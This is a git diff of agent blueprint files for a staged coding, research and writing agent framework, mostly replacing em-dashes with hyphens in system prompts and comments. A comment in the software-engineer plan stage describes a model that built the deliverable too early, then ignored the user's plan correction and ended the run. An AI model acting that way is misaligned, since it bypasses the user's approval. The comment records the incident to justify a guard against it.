@@ -132,7 +132,7 @@ read_file = "findings"
 list_dir  = "findings"
 
 [stages.deep_review.transitions.report]
-hint = "Analysis complete — write the report"
+hint = "Analysis complete - write the report"
 transform = "compact"
 
 [stages.deep_review.transitions.error_handler]
@@ -151,9 +151,9 @@ Produce the review report from the `findings` region, structured by the
 `severity_index` tally so the counts and the report agree.
 
 Order findings most-severe first and group by severity level:
-  ## Critical — <must fix before merge>
-  ## Warning  — <should fix>
-  ## Info     — <nice to have>
+  ## Critical - <must fix before merge>
+  ## Warning  - <should fix>
+  ## Info     - <nice to have>
 For each: file and line, one-sentence defect summary, the failure scenario, and the
 fix. End with a short overall assessment (ship / ship-with-fixes / needs-work) that
 matches the severity_index totals.
@@ -177,7 +177,7 @@ continue with the rest.
 """
 
 [stages.error_handler.transitions.deep_review]
-hint = "Recovered — resume the deep review"
+hint = "Recovered - resume the deep review"
 transform = "compact"
 
 [compaction]
@@ -188,14 +188,14 @@ model = "claude-sonnet-5"
 # Budgets are a percentage of the model's context window (issue #100) with an
 # absolute `max_tokens` guard-rail. Percentages are ceilings, not reservations.
 [context.regions]
-# The code/diff to review — required. Supply via `--diff <text|@file>` (CLI),
+# The code/diff to review - required. Supply via `--diff <text|@file>` (CLI),
 # a ---region:diff--- block (ACP), or the API `regions` field.
 diff            = { kind = "pinned", budget = "20%", max_tokens = 20000, required = true, seed = "diff", required_message = "Provide the code or diff to review via --diff <text|@file>." }
 # Optional caller focus, e.g. --criteria "focus on security / backwards-compat".
 review_criteria = { kind = "pinned", budget = "2%",  max_tokens = 3000, seed = "criteria" }
 # Pre-loaded on startup: architecture / conventions (missing files skipped).
 project_context = { kind = "pinned", budget = "4%",  max_tokens = 5000, seed = { files = ["ARCHITECTURE.md", "DESIGN.md", "docs/ARCHITECTURE.md", "CONVENTIONS.md", "CONTRIBUTING.md", "README.md"] } }
-# Deterministic repo scan, run once at spawn (issue #108) — the discover stage
+# Deterministic repo scan, run once at spawn (issue #108) - the discover stage
 # starts from facts instead of burning iterations on `ls`. `git ls-files` behaves
 # identically on POSIX and Windows shells; outside a git repo it fails and this is
 # simply left empty (non-fatal), and oversized output is trimmed to the budget.
@@ -215,6 +215,6 @@ severity_index  = { kind = "pinned",    budget = "2%",  max_tokens = 2000 }
 report          = { kind = "clearable", budget = "7%",  max_tokens = 8000 }
 
 # The message stream. Every blueprint needs an explicit sliding_window
-# `conversation` region — the layout that replaces it on each stage transition is
+# `conversation` region - the layout that replaces it on each stage transition is
 # rebuilt from this table, so an auto-added one would be dropped after stage 1.
 conversation    = { kind = "sliding_window", max_items = 30, budget = "15%", max_tokens = 18000, strategy = "bulk", overflow = 10 }

--- a/agents/software-engineer/agent.leviath
+++ b/agents/software-engineer/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "software-engineer"
 version = "0.0.1"
-description = "Plan-then-implement agent — mirrors the Claude Code discover→plan→approve→code→review workflow"
+description = "Plan-then-implement agent - mirrors the Claude Code discover→plan→approve→code→review workflow"
 entry_stage = "discover"
 
 # Global tool permissions for this agent: write tools require approval by default.
@@ -29,21 +29,21 @@ system_prompt = """
 Before any planning, answer two questions about THIS repository: what is it, and
 how do I verify work in it? Do not plan or edit here.
 
-Start from what you already have — do not rediscover it:
+Start from what you already have - do not rediscover it:
 - `repo_files` holds the tracked file list (empty if this isn't a git repo).
 - `architecture` is pre-loaded with design docs, `constraints` with any
   caller-supplied limits.
 - If `.leviath/discovery.md`, `CLAUDE.md`, `AGENTS.md` or
   `.github/copilot-instructions.md` exist, read them and treat them as
-  authoritative — they were written for exactly this purpose.
+  authoritative - they were written for exactly this purpose.
 
 Then fill the gaps with list_dir/read_file, and use bash ONLY to interrogate the
 build/test tooling read-only (e.g. `pytest --collect-only -q`, `cargo test
---list`, `npm run`). Do not modify anything. You have few iterations — spend
+--list`, `npm run`). Do not modify anything. You have few iterations - spend
 them on the area the task touches, not a full tour.
 
 This stage does not build the deliverable. If you find yourself creating the
-thing the task asked for, stop — that is `implement`'s job, and doing it here
+thing the task asked for, stop - that is `implement`'s job, and doing it here
 means the plan gets written against work you have already done rather than
 against the repository. If a scratch file is genuinely unavoidable to answer a
 question about the tooling, delete it before you finish, and say in `discovery`
@@ -60,12 +60,12 @@ Write `discovery` (context_write) covering:
 Then classify the project into exactly one tier and write `workflow`
 (context_write) with the tier, the concrete commands, and the completion bar:
 
-- TIER 1 — no tests, no CI, nothing to verify against. The plan must include
+- TIER 1 - no tests, no CI, nothing to verify against. The plan must include
   BUILDING verification: name the smoke test or assertion to write, and how to
   run it. Say plainly that there is no baseline to compare against.
-- TIER 2 — some tests exist but coverage is patchy. Name the tests that already
+- TIER 2 - some tests exist but coverage is patchy. Name the tests that already
   cover the area being changed, and the gap a new test should fill.
-- TIER 3 — rich test suite. Name the exact subset to run for this task (a full
+- TIER 3 - rich test suite. Name the exact subset to run for this task (a full
   suite run per edit is too slow) and the full-suite command for the final pass.
 
 `workflow` must end with three literal lines the later stages execute verbatim:
@@ -77,7 +77,7 @@ If there is genuinely no way to verify (tier 1 with no runnable code yet), say
 so explicitly in `workflow` rather than inventing a command that won't run.
 """
 
-# Scan output is bulky and single-use — park it in clearable scratch, not the
+# Scan output is bulky and single-use - park it in clearable scratch, not the
 # knowledge regions the later stages read.
 [stages.discover.tool_routing]
 default_region = "conversation"
@@ -106,12 +106,12 @@ available_tools = ["read_file", "list_dir", "ask_user_text", "ask_user_choice", 
 max_iterations = 20
 max_revisits = 6
 # "Abort" is handled deterministically by the engine (see abort_options on the
-# plan_approval interaction point), so allow_complete is not required here — and
+# plan_approval interaction point), so allow_complete is not required here - and
 # leaving it on let a model end the whole run from `plan`.
 #
 # That is not hypothetical: a model that had created a file during `discover`
 # (which has `bash`) read it back here, concluded "already created and verified
-# in the previous step — no further action is needed", and completed. The user's
+# in the previous step - no further action is needed", and completed. The user's
 # correction to the plan was applied to the document and then ignored, because
 # the model had already decided there was nothing to do. `implement` never ran.
 #
@@ -123,7 +123,7 @@ transition_prompt = """
 You've shown the plan to the user and asked them to approve it, request
 revisions, or edit it directly.
 
-- If they approved the plan, transition to 'implement' — UNLESS the plan rests
+- If they approved the plan, transition to 'implement' - UNLESS the plan rests
   on an assumption you have not verified (you are unsure an API/library behaves
   as assumed, or `discovery` did not pin down where the behavior you must change
   lives). In that case transition to 'prototype' to settle it with a small spike
@@ -139,7 +139,7 @@ system_prompt = """
 You are the planning stage of a code assistant.
 
 Your job:
-1. Read `discovery` and `workflow` first — the discover stage already mapped this
+1. Read `discovery` and `workflow` first - the discover stage already mapped this
    codebase and chose how the work will be verified. `architecture` holds design
    docs and `constraints` any caller-supplied limits (tech stack, timeline,
    budget). Explore with list_dir/read_file only to fill real gaps left by those.
@@ -153,17 +153,17 @@ Your job:
 
 If the task is genuinely ambiguous (e.g. missing requirements, or a real
 fork in approach you can't resolve yourself), use ask_user_text or
-ask_user_choice to ask BEFORE producing the plan — don't guess on things
+ask_user_choice to ask BEFORE producing the plan - don't guess on things
 only the user can answer. Don't ask about things you can reasonably decide
 yourself.
 
 This stage does not touch the codebase. You have no tool here that writes or
-edits a file, and calling one is refused — planning that starts writing is how a
+edits a file, and calling one is refused - planning that starts writing is how a
 run ends up with code nobody approved. Describe the change; `implement` makes it.
 If a claim in the plan needs proving before it is worth writing down, that is what
 `prototype` is for.
 
-Be specific — the implement stage will execute exactly what you write here.
+Be specific - the implement stage will execute exactly what you write here.
 End with:
 
 ## Plan
@@ -189,13 +189,13 @@ read_file = "codebase"
 list_dir  = "codebase"
 
 [stages.plan.transitions.implement]
-hint = "Plan approved and the approach is verified — proceed to implementation"
+hint = "Plan approved and the approach is verified - proceed to implementation"
 
 [stages.plan.transitions.prototype]
-hint = "Plan approved but rests on an unverified assumption — spike it first"
+hint = "Plan approved but rests on an unverified assumption - spike it first"
 
 [stages.plan.transitions.plan]
-hint = "User asked for revisions or more detail — keep planning"
+hint = "User asked for revisions or more detail - keep planning"
 
 [stages.plan.transitions.error_recovery]
 condition = "error"
@@ -206,31 +206,31 @@ name     = "plan_approval"
 prompt   = "Review the plan above. What would you like to do?"
 required = true
 style    = "multiple_choice"
-options  = ["Approve — proceed to implementation", "Revise — I'll describe changes", "Add detail — expand a section", "Abort — cancel this run"]
+options  = ["Approve - proceed to implementation", "Revise - I'll describe changes", "Add detail - expand a section", "Abort - cancel this run"]
 
 # The pinned region that holds the authoritative plan. Each time this point is
-# presented, the current plan — the model's output, or the user's direct edit —
+# presented, the current plan - the model's output, or the user's direct edit -
 # REPLACES this region, so revisions build on the current version (the user's
 # edits included) instead of regenerating the plan from the task.
 document_region = "plan"
 
-# "Abort" ends the run immediately (engine-level, deterministic) — no further
+# "Abort" ends the run immediately (engine-level, deterministic) - no further
 # inference, no transition.
-abort_options = ["Abort — cancel this run"]
+abort_options = ["Abort - cancel this run"]
 
 # "Add detail" opens the current plan in an editable field (engine-level,
-# deterministic) so the user modifies it directly — no dependence on the model
+# deterministic) so the user modifies it directly - no dependence on the model
 # choosing to call an edit tool. The edited text becomes the authoritative plan.
-edit_options = ["Add detail — expand a section"]
+edit_options = ["Add detail - expand a section"]
 
 # Directives keyed by option label. Selecting one keeps the run in the plan
 # stage and injects the directive into the agent's context so it drives the
 # next step via a tool call (deterministic routing, agent-driven capture).
 [stages.plan.interaction_points.directives]
-"Revise — I'll describe changes" = "The user wants to revise the plan. Call the ask_user_text tool to ask exactly what they want changed. Then start from the CURRENT plan (in the 'plan' section of your context — it already includes any edits the user made directly) and apply ONLY the requested change, preserving every other detail verbatim (wording, file names, and exact strings the user chose). Do not revert earlier user edits or 'correct' them back to defaults. End with the '## Plan' and '## Files' sections so it can be re-approved."
+"Revise - I'll describe changes" = "The user wants to revise the plan. Call the ask_user_text tool to ask exactly what they want changed. Then start from the CURRENT plan (in the 'plan' section of your context - it already includes any edits the user made directly) and apply ONLY the requested change, preserving every other detail verbatim (wording, file names, and exact strings the user chose). Do not revert earlier user edits or 'correct' them back to defaults. End with the '## Plan' and '## Files' sections so it can be re-approved."
 
 # ─── Stage 2b: Prototype (elective) ──────────────────────────────────────────
-# NOT a mandatory hop — `plan` only routes here when the approved plan rests on
+# NOT a mandatory hop - `plan` only routes here when the approved plan rests on
 # an assumption the agent has not actually verified. It buys information
 # cheaply: prove or kill the riskiest assumption, record what was ruled out, and
 # correct the plan so `implement` executes evidence instead of a guess. The
@@ -244,7 +244,7 @@ max_iterations = 15
 max_revisits = 2
 transition_prompt = """
 Spike complete. Based on what you actually observed:
-- Respond with `implement` if a hypothesis held up — you now know where the
+- Respond with `implement` if a hypothesis held up - you now know where the
   change belongs and what it should do.
 - Respond with `plan` if every hypothesis failed. The approved plan rests on a
   wrong premise, so the user needs to see and approve a corrected one rather
@@ -259,12 +259,12 @@ the smallest thing that actually runs.
 1. State the assumption in a sentence.
 2. Prove or disprove it: a throwaway script, a failing test that reproduces the
    bug, a bash one-liner that greps for where the behavior really lives. Use the
-   VERIFY command from `workflow` — do not invent your own. For a BUGFIX the
+   VERIFY command from `workflow` - do not invent your own. For a BUGFIX the
    spike IS the reproduction; do not move on without one.
 3. Append the result to the `prototypes` region (context_append): the
    assumption, the verdict, the exact command or snippet that settled it, and
    the file paths you confirmed. Record what you RULED OUT as carefully as what
-   worked — a dead end you don't write down gets retried.
+   worked - a dead end you don't write down gets retried.
 4. Before you leave, write the corrected approach to the `plan` region
    (context_write, key "plan"). Preserve the user's intent and any wording they
    chose; correct only the technical route. That plan is what runs next.
@@ -283,18 +283,18 @@ write_file = "implementation"
 edit_file  = "implementation"
 
 [stages.prototype.transitions.implement]
-hint = "A hypothesis held up — implement it properly"
+hint = "A hypothesis held up - implement it properly"
 transform = "compact"
 
 [stages.prototype.transitions.plan]
-hint = "Every hypothesis failed — the plan's premise is wrong, re-plan with the user"
+hint = "Every hypothesis failed - the plan's premise is wrong, re-plan with the user"
 transform = "compact"
 
 [stages.prototype.transitions.reassess]
 condition = "stuck"
 stuck_after_iterations = 12
 stuck_after_same_file_edits = 4
-hint = "The spike is going in circles — step back"
+hint = "The spike is going in circles - step back"
 transform = "direct"
 
 [stages.prototype.transitions.error_recovery]
@@ -316,41 +316,41 @@ system_prompt = """
 You are the implementation stage. The plan in the `plan` region has been approved.
 Execute it step by step:
 - Use write_file to create new files and edit_file to modify existing ones. Do
-  NOT edit files through bash — no `sed -i`, no `tee`, no `>`/`>>` redirection,
+  NOT edit files through bash - no `sed -i`, no `tee`, no `>`/`>>` redirection,
   no here-docs. Only write_file/edit_file are recorded in the `implementation`
   region the reviewer reads, and this stage will not hand off until at least one
   of them has landed.
-- Use bash to run tests or verify the build after writing — output goes to
+- Use bash to run tests or verify the build after writing - output goes to
   `test_results`.
 
 Follow the workflow the discover stage synthesized in `workflow`. It ends with
-three literal lines — BASELINE, VERIFY and DONE WHEN. Execute them:
+three literal lines - BASELINE, VERIFY and DONE WHEN. Execute them:
 
 1. BASELINE, before your FIRST edit. Run the BASELINE command and context_write
    the result to `baseline`: which tests pass and which already fail. You cannot
    tell a regression from a pre-existing failure without this. (TIER 1 / no
-   runnable suite: write "no baseline — nothing to run yet" and build the
+   runnable suite: write "no baseline - nothing to run yet" and build the
    verification the plan calls for as your first change.)
 2. VERIFY after each logical change, not just at the end.
 3. Compare every VERIFY against `baseline`. If a test that passed in `baseline`
-   now fails, you broke it: say so explicitly — "I broke <test> with my change to
-   <file>, investigating" — and fix it before writing anything else.
+   now fails, you broke it: say so explicitly - "I broke <test> with my change to
+   <file>, investigating" - and fix it before writing anything else.
 4. Before finishing, run the full-suite command from `workflow` once.
 
 You are NOT done because most tests pass. You are done when DONE WHEN is met:
 the target tests pass AND nothing that passed in `baseline` fails now. If tests
-are still failing, say how many and keep going — do not stop early.
+are still failing, say how many and keep going - do not stop early.
 
 As you work, keep two running logs so the review stage (and any restart) has
 the full picture without re-scanning:
 - `decisions` (context_append): each non-obvious design/architectural choice and
-  the WHY behind it — invaluable when review questions a call.
+  the WHY behind it - invaluable when review questions a call.
 - `changelog` (context_append): one line per file created/modified, so review
   knows exactly what to check.
 
 If you hit a genuine ambiguity the plan didn't resolve (e.g. conflicting
 requirements, or a destructive/hard-to-reverse action you're unsure about),
-use ask_user_text or ask_user_confirm to check before proceeding — don't
+use ask_user_text or ask_user_confirm to check before proceeding - don't
 silently guess on something the user would want a say in.
 
 Work methodically through each plan step. After all steps, give a concise summary
@@ -364,7 +364,7 @@ that nothing regressed against `baseline`.
 #
 # write_file/edit_file confirmations persist in `implementation`, alongside the
 # hand-written `changelog`: it is a mechanical record of every file touched, it
-# survives `conversation` eviction, and — being persisted context — it satisfies
+# survives `conversation` eviction, and - being persisted context - it satisfies
 # the transition gates below after a daemon restart, when per-stage counters are
 # gone.
 [stages.implement.tool_routing]
@@ -378,7 +378,7 @@ edit_file  = "implementation"
 
 # Both non-error edges are gated: an agent that explored through bash and changed
 # nothing is sent back for another pass rather than handing an untouched workspace
-# to review — or slipping out sideways via the `plan` edge, which can itself end
+# to review - or slipping out sideways via the `plan` edge, which can itself end
 # the run (issue #107).
 [stages.implement.transitions.review]
 hint = "Implementation complete, ready for review"
@@ -395,13 +395,13 @@ gate = { require_modifications = true, region = "implementation", max_attempts =
 # Runtime escape hatch (issue #106). Distinct from the voluntary `plan` edge
 # above: that one requires the agent to NOTICE it is lost, which is exactly what
 # fails when it is stuck. This one fires on measured behavior instead, and is
-# ungated — a stuck agent is not helped by being told to write more.
+# ungated - a stuck agent is not helped by being told to write more.
 [stages.implement.transitions.reassess]
 condition = "stuck"
 stuck_after_iterations = 20
 stuck_after_minutes = 15
 stuck_after_same_file_edits = 5
-hint = "No forward progress — step back and reassess"
+hint = "No forward progress - step back and reassess"
 transform = "custom"
 # `custom`, not `compact`: a plain compact edge would summarize EVERY
 # stage-specific region including `test_results`, the raw evidence reassess most
@@ -445,7 +445,7 @@ Use the `changelog` region to see exactly which files changed (the
 saw, if the changelog looks incomplete), and `decisions` to understand why choices
 were made before you question them. Read those files and provide a quality review:
 You review here; you do not repair. There is no write or edit tool in this
-stage and calling one is refused — a reviewer who fixes what they find is the
+stage and calling one is refused - a reviewer who fixes what they find is the
 same person marking their own work. Report the problem and route back to
 `implement`, which is where changes are made and re-reviewed.
 
@@ -454,7 +454,7 @@ same person marking their own work. Report the problem and route back to
 - Code quality: clarity, naming, error handling, conventions.
 - Security: any obvious vulnerabilities?
 
-Re-run the tests with bash — use the commands in `workflow`, which the implement
+Re-run the tests with bash - use the commands in `workflow`, which the implement
 stage was told to follow (output → `test_results`). Don't approve on an
 unverified claim that tests pass. Then diff what you ran against `baseline`:
 anything that passed there and fails now is a regression, and is grounds for
@@ -463,8 +463,8 @@ so if the implement stage skipped its own stated workflow (no baseline captured,
 verification never run).
 
 End with one of:
-  APPROVED — no significant issues
-  NEEDS CHANGES — <list specific required changes>
+  APPROVED - no significant issues
+  NEEDS CHANGES - <list specific required changes>
 """
 
 [stages.review.tool_permissions]
@@ -481,7 +481,7 @@ list_dir  = "codebase"
 bash      = "test_results"
 
 [stages.review.transitions.implement]
-hint = "Issues found — needs another implementation pass"
+hint = "Issues found - needs another implementation pass"
 transform = "custom"
 
 [stages.review.transitions.implement.transform_config]
@@ -495,7 +495,7 @@ condition = "error"
 transform = "direct"
 
 # ─── Stage 4b: Reassess ──────────────────────────────────────────────────────
-# Reached ONLY via a `stuck` edge (issue #106) — invisible during normal flow,
+# Reached ONLY via a `stuck` edge (issue #106) - invisible during normal flow,
 # exactly like error_recovery. Deliberately has NO write tools: the point is to
 # stop editing and start thinking. It reads the runtime's `stuck_report` (which
 # threshold tripped and why), finds the wrong assumption, and corrects the plan
@@ -508,13 +508,13 @@ available_tools = ["read_file", "list_dir", "bash", "context_write", "context_ap
 max_iterations = 8
 max_revisits = 2
 system_prompt = """
-You are NOT here to write code — you have no write tools on purpose. You were
+You are NOT here to write code - you have no write tools on purpose. You were
 pulled out of implementation because you stopped making progress. The
 `stuck_report` region says which threshold tripped and why.
 
 Work through this in order:
 1. Re-read the ORIGINAL task in `task` and the user's `constraints`. State in
-   one sentence what "done" means. Not what the plan says — what the task says.
+   one sentence what "done" means. Not what the plan says - what the task says.
    Check it against the DONE WHEN line in `workflow`.
 2. Separate what you have VERIFIED (a command you ran and an output you saw)
    from what you ASSUMED. `test_results`, `changelog`, `decisions` and
@@ -531,7 +531,7 @@ Work through this in order:
 Then rewrite the `plan` region (context_write, key "plan") with a corrected
 numbered plan whose FIRST step is the smallest change you can verify with one
 command, and which names explicitly what NOT to touch again. Preserve the user's
-approved intent — correct the route, not the destination. Append one line to
+approved intent - correct the route, not the destination. Append one line to
 `errors` naming the dead end so it is not retried.
 """
 
@@ -549,7 +549,7 @@ list_dir  = "codebase"
 bash      = "test_results"
 
 [stages.reassess.transitions.implement]
-hint = "Corrected plan in hand — retry implementation"
+hint = "Corrected plan in hand - retry implementation"
 transform = "custom"
 [stages.reassess.transitions.implement.transform_config]
 carry = ["discovery", "workflow", "task", "constraints", "architecture", "plan", "codebase", "implementation", "prototypes", "changelog", "decisions", "errors", "stuck_report"]
@@ -562,7 +562,7 @@ condition = "error"
 transform = "direct"
 
 # ─── Stage 5: Error Recovery ────────────────────────────────────────────────
-# Only reachable via error condition edges — invisible during normal flow.
+# Only reachable via error condition edges - invisible during normal flow.
 
 [stages.error_recovery]
 mode = "autonomous"
@@ -607,13 +607,13 @@ constraints  = { kind = "pinned", budget = "1%", max_tokens = 2000, seed = "cons
 architecture = { kind = "pinned", budget = "3%", max_tokens = 6000, seed = { files = ["ARCHITECTURE.md", "DESIGN.md", "docs/ARCHITECTURE.md", "docs/architecture.md", "README.md"] } }
 plan         = { kind = "pinned", budget = "5%", max_tokens = 6000 }
 # Verified findings from a `prototype` spike: the assumption, the verdict, and
-# the command that settled it — including what was RULED OUT. Pinned so neither
+# the command that settled it - including what was RULED OUT. Pinned so neither
 # implement nor reassess redoes the spike.
 prototypes   = { kind = "pinned", budget = "4%", max_tokens = 6000 }
 # Written by the RUNTIME when a `stuck` edge fires (issue #106): which threshold
 # tripped and why. Pinned so it survives the edge transform into `reassess`.
 stuck_report = { kind = "pinned", budget = "1%", max_tokens = 2000 }
-# Deterministic repo scan, run once at spawn — the discover stage starts from
+# Deterministic repo scan, run once at spawn - the discover stage starts from
 # facts instead of burning iterations on `ls`. `git ls-files` behaves identically
 # on POSIX and Windows shells; outside a git repo it fails and this is simply
 # left empty (non-fatal), and oversized output is trimmed to the budget.
@@ -644,7 +644,7 @@ changelog    = { kind = "sliding_window", max_items = 20, budget = "2%", max_tok
 test_results = { kind = "clearable",      budget = "4%", max_tokens = 5000 }
 # A small sliding window so a repeating failure is visible as a pattern rather
 # than a one-off. Written explicitly via context_append by error_recovery and
-# reassess — never by tool routing (only `conversation` may hold routed tool
+# reassess - never by tool routing (only `conversation` may hold routed tool
 # results; a second sliding_window desyncs them from their tool_use → API 400).
 errors       = { kind = "sliding_window", max_items = 5, budget = "2%", max_tokens = 3000 }
 

--- a/agents/wide-researcher/agent.leviath
+++ b/agents/wide-researcher/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "wide-researcher"
 version = "0.0.1"
-description = "Broad multi-topic survey — cast a wide net, compare approaches, dive on the interesting threads, and produce a landscape overview"
+description = "Broad multi-topic survey - cast a wide net, compare approaches, dive on the interesting threads, and produce a landscape overview"
 entry_stage = "survey"
 
 [tool_permissions]
@@ -29,7 +29,7 @@ over depth:
 Run web_search across the distinct facets, web_fetch a few representative sources
 per facet, read_file for local material. Landscape material lands in `landscape`.
 For each source you use, append a bibliography line to `sources_index`
-(context_append): `[n] <title> — <url/path> — credibility: <high/med/low>`.
+(context_append): `[n] <title> - <url/path> - credibility: <high/med/low>`.
 Note interesting threads worth pulling on later. If sent back, focus on the named
 coverage gap.
 """
@@ -43,7 +43,7 @@ read_file  = "landscape"
 list_dir   = "landscape"
 
 [stages.survey.transitions.compare]
-hint = "Landscape mapped — ready to compare approaches"
+hint = "Landscape mapped - ready to compare approaches"
 transform = "direct"
 
 [stages.survey.transitions.error_recovery]
@@ -77,7 +77,7 @@ can rank them fairly. Help the reader see the shape of the field.
 """
 
 [stages.compare.transitions.survey]
-hint = "Coverage gaps — survey additional areas"
+hint = "Coverage gaps - survey additional areas"
 transform = "compact"
 
 [stages.compare.transitions.deep_dive]
@@ -85,7 +85,7 @@ hint = "An interesting thread deserves a focused deep read"
 transform = "compact"
 
 [stages.compare.transitions.summarize]
-hint = "Comparison complete — write the overview"
+hint = "Comparison complete - write the overview"
 transform = "compact"
 
 [stages.compare.transitions.error_recovery]
@@ -105,7 +105,7 @@ Compare flagged a specific thread for a focused read. web_search / web_fetch the
 best sources on JUST that thread, read them, and append the findings to
 `landscape` plus a note to `deep_dives` capturing what makes it notable (with
 source refs) and a bibliography line to `sources_index`. Then hand back to compare.
-Stay on the flagged thread — this is depth on one item, not a new broad survey.
+Stay on the flagged thread - this is depth on one item, not a new broad survey.
 """
 
 [stages.deep_dive.tool_routing]
@@ -116,7 +116,7 @@ web_fetch  = "landscape"
 read_file  = "landscape"
 
 [stages.deep_dive.transitions.compare]
-hint = "Thread explored — resume comparing"
+hint = "Thread explored - resume comparing"
 transform = "compact"
 
 [stages.deep_dive.transitions.error_recovery]
@@ -140,7 +140,7 @@ citing `sources_index` per the rules in `format`. Include:
 - Trends and trajectory
 - Recommendations (what to look at first, by goal)
 
-Write concisely — the reader wants the lay of the land quickly. Cite sources for
+Write concisely - the reader wants the lay of the land quickly. Cite sources for
 non-obvious claims.
 """
 
@@ -161,7 +161,7 @@ gap, and return to compare to continue with the coverage you have.
 """
 
 [stages.error_recovery.transitions.compare]
-hint = "Recovered — continue comparing"
+hint = "Recovered - continue comparing"
 transform = "compact"
 
 [compaction]

--- a/agents/writing-assistant/agent.leviath
+++ b/agents/writing-assistant/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "writing-assistant"
 version = "0.0.1"
-description = "Research-backed writing — topic to polished draft, with a web-research stage, an interactive outline checkpoint, a draft⇄edit loop, and a final proofread pass"
+description = "Research-backed writing - topic to polished draft, with a web-research stage, an interactive outline checkpoint, a draft⇄edit loop, and a final proofread pass"
 entry_stage = "research"
 
 [tool_permissions]
@@ -28,7 +28,7 @@ Research the topic in `task` to prepare for writing. Gather:
 
 Use web_search + web_fetch for sources and read_file for local material; findings
 land in `research`. For each source you'll rely on, append a bibliography line to
-`sources_index` (context_append): `[n] <title> — <url/path>`. Organize by theme;
+`sources_index` (context_append): `[n] <title> - <url/path>`. Organize by theme;
 mark points well-supported vs speculative; flag anything needing verification. If
 sent back, focus on the gap the user or outline identified.
 """
@@ -67,7 +67,7 @@ You've shown the outline and asked the user what to do:
 - If they want to gather more material first, transition to 'research'.
 """
 system_prompt = """
-Propose an OUTLINE for the piece based on `research` — do NOT write the article
+Propose an OUTLINE for the piece based on `research` - do NOT write the article
 itself and do NOT create any files here. The draft stage writes the piece AFTER
 the user approves this outline; your job is only to get the structure right.
 
@@ -79,15 +79,15 @@ Present, as your response text:
 
 Then let the user steer via the approval prompt. If they revise or expand, produce
 an updated outline grounded in their actual feedback before asking again. Keep it
-to an outline — no prose paragraphs of the finished piece.
+to an outline - no prose paragraphs of the finished piece.
 """
 
 [stages.outline.transitions.draft]
-hint = "Outline approved — write the draft"
+hint = "Outline approved - write the draft"
 transform = "compact"
 
 [stages.outline.transitions.outline]
-hint = "User asked to revise or expand — keep refining the outline"
+hint = "User asked to revise or expand - keep refining the outline"
 transform = "direct"
 
 [stages.outline.transitions.research]
@@ -103,17 +103,17 @@ name     = "outline_approval"
 prompt   = "Review the outline above. What would you like to do?"
 required = true
 style    = "multiple_choice"
-options  = ["Approve — write the draft", "Revise — I'll describe changes", "Expand a section — I'll say which", "Research more first", "Abort — cancel this piece"]
+options  = ["Approve - write the draft", "Revise - I'll describe changes", "Expand a section - I'll say which", "Research more first", "Abort - cancel this piece"]
 
 # "Abort" ends the run immediately (engine-level, deterministic).
-abort_options = ["Abort — cancel this piece"]
+abort_options = ["Abort - cancel this piece"]
 
 # Directives keep the run in the outline stage and tell the agent to gather the
 # user's intent via a tool call before revising, rather than acting on the bare
 # option label.
 [stages.outline.interaction_points.directives]
-"Revise — I'll describe changes" = "The user wants to revise the outline. Call the ask_user_text tool to ask exactly what they want changed, then present an updated outline before asking again."
-"Expand a section — I'll say which" = "The user wants to expand a section. Call the ask_user_text tool to ask which section and what it should cover, then present an updated outline before asking again."
+"Revise - I'll describe changes" = "The user wants to revise the outline. Call the ask_user_text tool to ask exactly what they want changed, then present an updated outline before asking again."
+"Expand a section - I'll say which" = "The user wants to expand a section. Call the ask_user_text tool to ask which section and what it should cover, then present an updated outline before asking again."
 
 # ─── Stage 3: Draft ───────────────────────────────────────────────────────────
 [stages.draft]
@@ -129,14 +129,14 @@ evidence from `research` (cite [n] where relevant). Guidelines:
 - Strong opening that hooks the reader
 - Each section flows logically to the next
 - Concrete examples over abstract statements
-- Clear, direct prose — no filler or hedging
+- Clear, direct prose - no filler or hedging
 - Strong conclusion that ties back to the thesis
 
 Write the complete piece. No placeholders or TODO markers.
 """
 
 [stages.draft.transitions.edit]
-hint = "Draft complete — self-edit"
+hint = "Draft complete - self-edit"
 transform = "compact"
 
 [stages.draft.transitions.error_recovery]
@@ -159,12 +159,12 @@ Decide what happens next:
 """
 system_prompt = """
 Edit the draft for structure and substance (not line-level polish yet):
-1. Accuracy — are claims supported by `research`? Any overstatements?
-2. Clarity — is each idea understandable on first read?
-3. Flow — does each section lead naturally to the next?
-4. Concision — cut anything that doesn't earn its place
-5. Voice — consistent, appropriate for the audience?
-6. Opening/closing — do they land?
+1. Accuracy - are claims supported by `research`? Any overstatements?
+2. Clarity - is each idea understandable on first read?
+3. Flow - does each section lead naturally to the next?
+4. Concision - cut anything that doesn't earn its place
+5. Voice - consistent, appropriate for the audience?
+6. Opening/closing - do they land?
 
 Make the edits directly (write the improved version). Note any substantive changes
 in `revisions` (context_append). Hand to proofread only once the structure is sound.
@@ -173,7 +173,7 @@ in `revisions` (context_append). Hand to proofread only once the structure is so
 # Custom transform: keep task/outline/research/sources pinned, compact the draft
 # discussion into a rewrite brief, clear scratch before rewriting.
 [stages.edit.transitions.draft]
-hint = "Structural issues found — needs a significant rewrite"
+hint = "Structural issues found - needs a significant rewrite"
 transform = "custom"
 [stages.edit.transitions.draft.transform_config]
 carry = ["task", "style_guide", "outline", "research", "sources_index"]
@@ -182,7 +182,7 @@ clear = ["scratch"]
 compact_prompt = "Summarize the structural problems as a numbered rewrite brief."
 
 [stages.edit.transitions.proofread]
-hint = "Structure is sound — do the final line-level pass"
+hint = "Structure is sound - do the final line-level pass"
 transform = "compact"
 
 [stages.edit.transitions.error_recovery]
@@ -213,11 +213,11 @@ Final line-level pass following `style_guide`:
   with web_fetch and correct or hedge it
 - Tighten wording; kill remaining filler
 Write the final polished version. Don't introduce new claims. Ship it (DONE) once
-clean — don't over-polish.
+clean - don't over-polish.
 """
 
 [stages.proofread.transitions.edit]
-hint = "A substantive problem surfaced — back to structural editing"
+hint = "A substantive problem surfaced - back to structural editing"
 transform = "compact"
 
 [stages.proofread.transitions.error_recovery]
@@ -238,7 +238,7 @@ note a workaround, then return to draft to continue with the material available.
 """
 
 [stages.error_recovery.transitions.draft]
-hint = "Recovered — continue drafting"
+hint = "Recovered - continue drafting"
 transform = "compact"
 
 [compaction]

--- a/crates/leviath-agent-client/Cargo.toml
+++ b/crates/leviath-agent-client/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
